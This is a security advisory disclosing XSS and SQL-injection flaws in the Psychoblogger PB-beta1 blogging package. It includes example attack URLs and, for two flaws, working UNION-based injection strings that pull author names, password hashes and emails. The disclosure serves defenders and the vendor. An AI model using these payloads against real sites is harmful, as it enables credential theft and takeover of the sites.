---------------------------------------
Title: Multiple vulnerabilities in Psychoblogger CMS package
Package description (From vendor website):
"This is a PHP/MySQL blogging tool with many features."
Vendor website:
http://www.psychoblogger.com
Affected versions:
To the best of my knowlege, there is only one public release available; PB-beta1
There may or may not have been some private developement done (unconfirmed).
Summary:
Psychoblogger is a CMS package aimed at providing weblogs (or 'blogs') with an easy to set up
system for editing and authoring the content.
The standard package has many inherit vulnerabilities that may allow the compromise of a web server
or website using the distributed code.
Vendor Contact:
Author contacted, advisory acknowledged, fixes to be released soon.
---------------------------------------
Vulnerabilities
VULN #1:
There is a Cross-Site-Scriting vulnerability in the script 'imageview.php',
which allows for insertion of scripting on the client-side. This can be exploited by setting
the 'desc' get variable. This variable is printed without any checking, in between the
tags.
Because scripting cannot be inserted directly into the title, one must first break out of the tag.
This can be exploited like so:
http://server.com/imageview.php?desc=
IMPACT: Low/Medium - This vulnerability may be able to be exploited to hijack the session of a currently logged-in
editor, and thus gaining administrative privileges over the weblog. However, (as usual) XSS vulns are quite hard to
exploit successfully.
VULN #2
A Cross-site-scripting vulnerability exists in the script 'entryadmin.php', 'authoredit.php', 'blockedit.php'
'configadmin.php' and 'quoteedit.php'. These vulnerabilities can be exploited by using a URI similar to the one below:
http://server.com/entryadmin.php?error=1&errormessage=
IMPACT: Low - These vulnerabilities may only be exploited if the user is currently logged in to the 'editor'
interface, and as such may be incredibly hard to exploit successfully.
VULN #3
A SQL-Injection vulnerability exists in the 'shouts.php' by using the variable 'shoutlimit'.
I have not been able to succesfully exploit this vulnerability to any great extent using UNION, as the original
script query already includes a 'order by' statement. However, the severity of this vuln is still quite large,
and if any wishes to provide some POC code for this, please let me know =)
IMPACT: Severe - SQL-Injection vulnerabilities can be used to obtain usernames and passwords of preveliged accounts
on the website.
VULN #4
Another SQL-Injection vulnerability exists in the comments.php script, using the variable 'blogid'.
By sending a HTTP 'POST' request to the file 'comments.php', with the variable 'blogid' set to the exploit string below,
an attacker could potentially obtain encrypted passwords for later brute-forcing.
The SQL injection that could exploit this vulnerability is demonstrated here:
1 and 'a'='z' union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid from blog_authors ba, blog_entries be where 'a'='a'
This string manipulates the SQL query into looking something like this:
select blogid,preview,entry,be.dateentered,title,pageviews,usepreview,name from blog_entries be inner join blog_authors ba on be.authorid=ba.authorid
where blogid=1 and 'a'='z' union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid from blog_authors ba, blog_entries be where 'a'='a'
and be.active=1
Which returns a result set that lists the user rights of the first user in the database (usually the administrator)
IMPACT: Critical - This vulnerability could allow for the stealing of encrypted passwords from the database,
which then allows them to be brute-forced
VULN #5
A third SQL-Injection vulnerability exists in the script 'functions.php' in the method blogs() where a SQL query is built.
(Note: The actual query is executed in 'userfunctions.php', method showblogs() in the appropriate skins directory)
By sending a request to the script 'category.php', one can manipulate the string into outputting an author password.
The SQL injection that could exploit this string is thus:
1 and 1=2 union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid,be.preview from blog_authors ba, blog_entries be where 1=1
This would manipulate the string into something like this:
select be.blogid,be.preview,be.entry,be.dateentered,be.title,be.pageviews,be.usepreview,ba.name,be.pinned from blog_entries be inner join blog_authors ba
on be.authorid=ba.authorid where catid=1 and 1=2 union select ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid,be.preview from blog_authors ba,
blog_entries be where 1=1 and be.active=1 order by be.dateentered desc
IMPACT: Critical - This vulnerability might allow for the stealing of encrypted password strings from the database.